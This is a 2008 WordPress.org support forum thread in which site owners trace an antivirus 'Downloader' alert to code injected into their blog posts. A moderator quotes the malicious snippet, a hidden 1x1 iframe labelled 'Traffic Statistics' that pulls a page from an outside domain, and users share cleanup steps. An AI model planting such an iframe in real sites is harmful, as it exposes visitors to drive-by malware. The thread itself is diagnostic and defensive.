WordPress.org

Support

Support » Miscellaneous » wp-stats[1].htm Downloader Virus – Upgrade to 2.3.2

wp-stats[1].htm Downloader Virus – Upgrade to 2.3.2

  • Ok, I’ve not been able to find much on the Internet about this issue.

    I upgraded my site to 2.3.2 and when viewing the site I get an alert about a virus.

    The virus is the Downloader virus and is supposedly in wp-stats[1].htm

    Anyone else have an idea about this scenario?

    Also, I’ve scanned all my files and there were no viruses found.

Viewing 15 replies - 1 through 15 (of 20 total)
  • Samuel Wood (Otto)
    WordPress.org Tech Dude

    @otto42

    What is the site? There is no “wp-stats[1].htm” as part of WordPress.

    The site:

    http://blogs.somelifeissues.com/

    I did a Google search for wp-stats[1].htm and came up with others who are encountering the same thing.

    Samuel Wood (Otto)
    WordPress.org Tech Dude

    @otto42

    Some code has been inserted into your post on November 16th:

    <p>I will return to writing<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> after the New Year. Enjoy the holidays!!!</p>

    That wp-stats-php.info site is where it comes from. Edit that post and remove that code.

    Likely your site got hacked before you upgraded.

    Never mind. Found it. Some how the following string got injected into one of my blogs ..gggggrrrrr

    <!– Traffic Statistics –> <iframe height=”1″ width=”1″ frameBorder=”0″ src=”http://www.wp-stats-XXXphp.info/iframe/wp-stats.XXXphp”></iframe><!– End Traffic Statistics –>

    The XXX is to prevent it from happening here.

    Thanks Otto. I see we found it at the same time.

    Appreciate the extra hand.

    Thanks for this post. It had infected one of my blogs as well. It was easy to view the source of my main blog page, find the two posts that had been affected, delete the code from the posts, and it was done. Does 2.3.2 prevent this from happening again?

    Duh – I just looked at the title of this thread! I will upgrade tonight!

    pcbenny1234
    Member

    @pcbenny1234

    ciao ragazzi io ho lo stesso problema e non riesco a risolverlo, aiuto! per favore. il mio sito รจ: http://www.margheritaorta.it

    ———————–

    Hello guys I have the same problem and I can not solve it, help! Please. My site is: http://www.margheritaorta.it

    I also got it. Same <!– Traffic Statistics –> code was inserted in one of my posts.

    I also visited home website of a top 10 themes and when I got to red secret 01 and visited the creator’s home page it attempted to run a downloader.exe, my norton detected it as a virus.

    Thanks for posting.

    delete or rename your xmlrpc.php

    jason-morrison
    Member

    @jason-morrison

    I ran into this too, this can get your site a nasty warning in Google and Firefox. Here’s a post about cleaning it up.

    how do you search the source of your posts? do i have to do this in the wp posts edit window? i hope not as i have 4 years worth of posts. if not, where can i find the actual post files for my blog so that i can batch search them locally?

    please, please help. and thank you so much!
    merideth
    http://house-made.com

    nevermind…i think i solved it.
    ๐Ÿ™‚

    As an FYI I had this hack happen to one of my blogs last evening (03/30/08). I would note that I had upgraded to WP 2.3.3 about two weeks ago and it wasn’t hacked as of yesterday afternoon. From this it would appear that WP 2.3.3 is vulnerable to this exploit.

    Cheers!
    Mike S.

    ok i’m still having this problem. I did a search and didn’t turn up anything with “traffic statistics” in it. I deleted the fake wp-stats file and my wordpress is updated. Any advice? Help?

    thanks so much!

    merideth
    http://house-made.com

Viewing 15 replies - 1 through 15 (of 20 total)
  • The topic ‘wp-stats[1].htm Downloader Virus – Upgrade to 2.3.2’ is closed to new replies.